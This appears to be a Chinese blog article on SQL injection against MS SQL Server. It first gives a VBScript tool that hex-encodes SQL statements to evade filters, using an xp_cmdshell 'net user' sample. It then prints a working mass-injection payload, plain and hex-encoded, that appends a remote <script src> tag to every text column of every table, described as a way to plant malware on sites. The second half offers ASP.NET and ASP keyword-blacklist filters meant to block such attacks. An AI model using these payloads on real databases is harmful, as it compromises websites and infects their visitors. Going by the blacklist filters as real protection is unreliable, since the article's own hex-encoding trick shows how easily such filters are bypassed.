SQL注入之SQL语句转十六进制
HTML代码
<script language=vbs>
sub sqlencode()
Dim strTest
strTest = form1.text1.value
myHex = Str2Hex(strTest)
document.write "<pre>DECLARE @S NVARCHAR(4000) SET @S=CAST(0x"&myhex&" AS NVARCHAR(4000)) EXEC(@S)</pre>"
end sub
Function Str2Hex(ByVal strHex)
Dim sHex
For i = 1 To Len(strHex)
sHex = sHex & Hex(Asc(Mid(strHex,i,1)))&"00"
Next
Str2Hex = sHex
End Function
</script>
<form name=form1 method="post">
<p>请输入sql语句,例子:</p><br>
<input type=text name=text1 value='exec master.dbo.xp_cmdshell "net user"--' size=100><input type=submit onclick=sqlencode()
value="给我转">
</form>
exp
原程序代码
DECLARE @T VARCHAR(255),@C VARCHAR(255)
DECLARE Table_Cursor CURSOR FOR
Select a.name,b.name FROM sysobjects a,syscolumns b Where a.id=b.id AND a.xtype='u' AND (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor FETCH NEXT
FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0)
BEGIN
EXEC('Update ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''<script src=http://****/*.js></script>''')
FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor
DEALLOCATE Table_Cursor
转换后的代码
DECLARE @S NVARCHAR(4000) SET @S=CAST(0x4400450043004C0041005200450020004000540020005600410052004300480041005200280032003500350029002C004000430020005600410052004300480041005200280032003500350029004400450043004C0041005200450020005400610062006C0065005F0043007500720073006F007200200043005500520053004F005200200046004F0052002000530065006C00650063007400200061002E006E0061006D0065002C0062002E006E0061006D0065002000460052004F004D0020007300790073006F0062006A006500630074007300200061002C0073007900730063006F006C0075006D006E00730020006200200057006800650072006500200061002E00690064003D0062002E0069006400200041004E004400200061002E00780074007900700065003D00270075002700200041004E0044002000280062002E00780074007900700065003D003900390020006F007200200062002E00780074007900700065003D003300350020006F007200200062002E00780074007900700065003D0032003300310020006F007200200062002E00780074007900700065003D00310036003700290020004F00500045004E0020005400610062006C0065005F0043007500720073006F00720020004600450054004300480020004E004500580054002000460052004F004D0020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C004000430020005700480049004C004500280040004000460045005400430048005F005300540041005400550053003D003000290042004500470049004E00200045005800450043002800270055007000640061007400650020005B0027002B00400054002B0027005D00200053004500540020005B0027002B00400043002B0027005D003D0052005400520049004D00280043004F004E005600450052005400280056004100520043004800410052002800340030003000300029002C005B0027002B00400043002B0027005D00290029002B00270027003C0073006300720069007000740020007300720063003D0068007400740070003A002F002F002A002A002A002A002F002A002E006A0073003E003C002F007300630072006900700074003E00270027002700290020004600450054004300480020004E004500580054002000460052004F004D0020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C0040004300200045004E004400200043004C004F005300450020005400610062006C0065005F0043007500720073006F00720020004400450041004C004C004F00430041005400450020005400610062006C0065005F0043007500720073006F007200 AS NVARCHAR(4000)) EXEC(@S)
功能是遍历该数据库的所有数据表中所有varchar ,text,nvarchar,ntext类型的字段,并在字段尾加上
<script src=http://****/*.js></script>,常用于js或iframe挂马。
ASP.NET防SQL注入程序代码
using System;
using System.Configuration;
using System.Web;
using System.Globalization;
namespace Koray.SqlInject
{
/* public class SqlInject
{
}
*/
public class SqlstrAny : IHttpModule
{
public void Init(HttpApplication application)
{
application.BeginRequest += (new
EventHandler(this.Application_BeginRequest));
}
private void Application_BeginRequest(Object source, EventArgs e)
{
ProcessRequest pr = new ProcessRequest();
pr.StartProcessRequest();
}
public void Dispose()
{
}
}
public class ProcessRequest
{
private static string SqlStr = System.Configuration.ConfigurationManager.AppSettings["SqlInject"].ToString();
private static string sqlErrorPage = System.Configuration.ConfigurationSettings.AppSettings["SQLInjectErrPage"].ToString();
///
/// 用来识别是否是流的方式传输
///
///
///
bool IsUploadRequest(HttpRequest request)
{
return StringStartsWithAnotherIgnoreCase(request.ContentType, "multipart/form-data");
}
///
/// 比较内容类型
///
///
///
///
private static bool StringStartsWithAnotherIgnoreCase(string s1, string s2)
{
return (string.Compare(s1, 0, s2, 0, s2.Length, true, CultureInfo.InvariantCulture) == 0);
}
//SQL注入式攻击代码分析
#region SQL注入式攻击代码分析
///
/// 处理用户提交的请求
///
public void StartProcessRequest()
{
HttpRequest Request = System.Web.HttpContext.Current.Request;
HttpResponse Response = System.Web.HttpContext.Current.Response;
try
{
string getkeys = "";
if (IsUploadRequest(Request)) return; //如果是流传递就退出
//字符串参数
if (Request.QueryString != null)
{
for (int i = 0; i < Request.QueryString.Count; i++)
{
getkeys = Request.QueryString.Keys[i];
if (!ProcessSqlStr(Request.QueryString[getkeys]))
{
logSqlstr(DateTime.Now.ToShortDateString() +" "+DateTime.Now.ToShortTimeString()+ ":" + Request.ServerVariables["Url"]);
logSqlstr(getkeys + "=" + Request.QueryString[getkeys]);
Response.Redirect(sqlErrorPage + "?errmsg=QueryStringError&sqlprocess=true");
Response.End();
}
}
}
//form参数
if (Request.Form != null)
{
for (int i = 0; i < Request.Form.Count; i++)
{
getkeys = Request.Form.Keys[i];
if (!ProcessSqlStr(Request.Form[getkeys]))
{
logSqlstr(DateTime.Now.ToShortDateString() + " " + DateTime.Now.ToShortTimeString() + ":" + Request.ServerVariables["Url"]);
logSqlstr(getkeys + "=" + Request.Form[getkeys]);
Response.Redirect(sqlErrorPage + "?errmsg=FormError&sqlprocess=true");
Response.End();
}
}
}
//cookie参数
if (Request.Cookies != null)
{
for (int i = 0; i < Request.Cookies.Count; i++)
{
getkeys = Request.Cookies.Keys[i];
if (!ProcessSqlStr(Request.Cookies[getkeys].Value))
{
logSqlstr(DateTime.Now.ToShortDateString() + " " + DateTime.Now.ToShortTimeString() + ":" + Request.ServerVariables["Url"]);
logSqlstr(getkeys + "=" + Request.Cookies[getkeys]);
Response.Redirect(sqlErrorPage + "?errmsg=CookieError&sqlprocess=true");
Response.End();
}
}
}
}
catch(Exception ex)
{
// 错误处理: 处理用户提交信息!
Response.Clear();
Response.Write("CustomErrorPage Error"+ex.Message);
Response.End();
}
}
///
/// 分析用户请求是否正常
///
/// 传入用户提交数据
/// 返回是否含有SQL注入式攻击代码
private bool ProcessSqlStr(string Str)
{
bool ReturnValue = true;
try
{
if (Str != "")
{
Str = Str.ToLower();
string[] anySqlStr = SqlStr.Split('|');
foreach (string ss in anySqlStr)
{
if (Str.IndexOf(ss) >= 0)
{
ReturnValue = false;
break;
}
}
}
}
catch
{
ReturnValue = false;
}
return ReturnValue;
}
private void logSqlstr(string str)
{
HttpRequest req = System.Web.HttpContext.Current.Request;
string fileName = "/Log/log_"+DateTime.Now.ToShortDateString().Replace("/","_")+".log";
fileName=req.MapPath(fileName);
if (!System.IO.File.Exists(fileName))
{
System.IO.FileStream f = System.IO.File.Create(fileName);
f.Close();
}
System.IO.StreamWriter f2 = new System.IO.StreamWriter(fileName, true, System.Text.Encoding.GetEncoding("utf-8"));
f2.WriteLine(str);
f2.Close();
f2.Dispose();
}
#endregion
}
}
在web.config中加入
<appSettings>
<add value="exec|insert|delete|update|chr|mid|master|truncate|declare|cast(|drop table" key="SQLInject" />
<add value="/error.aspx" key="SQLInjectErrPage" />
</appSettings>
<httpModules>
<add name="SqlstrAny" type="Koray.SqlInject.SqlstrAny,Koray.SqlInject"/>
</httpModules>
ASP.NET组件参考了:
http://hi.baidu.com/honfei/blog/item/7d6bd23610cd0edaa3cc2ba8.html
ASP防SQL注入代码
Sub SQLInject
Dim strTemp,errLogFile,rtnerr,RtnArr,ErrLogFileName
ErrLogFileName="/Log/err_"&DateToStr(Now(),"Y-m-d")&".log"
strTemp=""
strTemp = strTemp & Request.ServerVariables("URL")
If Trim(Request.QueryString) <> "" Then strTemp = strTemp & "?" & Trim(Request.QueryString)
strTemp = Lcase(strTemp)
If Instr(strTemp,"declare") or Instr(strTemp,"select") or Instr(strTemp,"insert into") or Instr(strTemp,"delete from") or Instr(strTemp,"count(") or Instr(strTemp,"drop table") or Instr(strTemp,"truncate") or Instr(strTemp,"mid(") or Instr(strTemp,"char(") or Instr(strTemp,"xp_cmdshell") or Instr(strTemp,"exec master") or Instr(strTemp,"net localgroup administrators") or Instr(strTemp,":") or Instr(strTemp,"net user") or Instr(strTemp,"'") then
RtnArr=LoadFromFile(ErrLogFileName)
if RtnArr(0)=0 then
errLogFile=RtnArr(1)
else
errLogFile="start"
end if
errLogFile=errLogFile&vbcrlf&vbcrlf
errLogFile=errLogFile&"IP:"&getIP()&" Time:"&Cstr(Now())&" Info:"&strTemp
rtnerr=SaveToFileByGb2312(errLogFile,ErrLogFileName)
Response.Write "<html><title>Waring</title><body bgcolor=""EEEEEE"" leftmargin=""60"" topmargin=""30""><font style=""font-size:16px;font-weight:bolder;color:blue;""><li>You has been submit a bad querystring!</li></font><font style=""font-size:14px;font-weight:bolder;color:red;""><br><li>Your Ip Has been record!</li><br><li>IP:"&getIP()&"</li><br><li>Time:"&Now&"</li></font></body></html><!--AddTime:"&now&"-->"
response.end
End If
End Sub
'读日志文件
Function LoadFromFile(ByVal File)
Dim objStream
Dim RText
RText=array(0,"")
Set objStream = Server.CreateObject("ADODB.Stream")
With objStream
.Type = 2
.Mode = 3
.Open
.Charset = "utf-8"
.Position = objStream.Size
on error resume next
.LoadFromFile Server.MapPath(File)
If Err Then
RText=array(Err.Number,Err.Description)
LoadFromFile=RText
Err.Clear
exit function
End If
RText=array(0,.ReadText)
.Close
End With
LoadFromFile=RText
Set objStream = Nothing
End Function
'写日志
Function SaveToFileByGb2312(ByVal strBody,ByVal File)
Dim objStream
Dim RText
RText=array(0,"")
Set objStream = Server.CreateObject("ADODB.Stream")
With objStream
.Type = 2
.Open
.Charset = "gb2312"
.Position = objStream.Size
.WriteText = strBody
.SaveToFile Server.MapPath(File),2
.Close
End With
RText=array(0,"保存文件成功!")
SaveToFileByGb2312=RText
Set objStream = Nothing
End Function
原文地址:http://www.nbman.cn/article.asp?id=112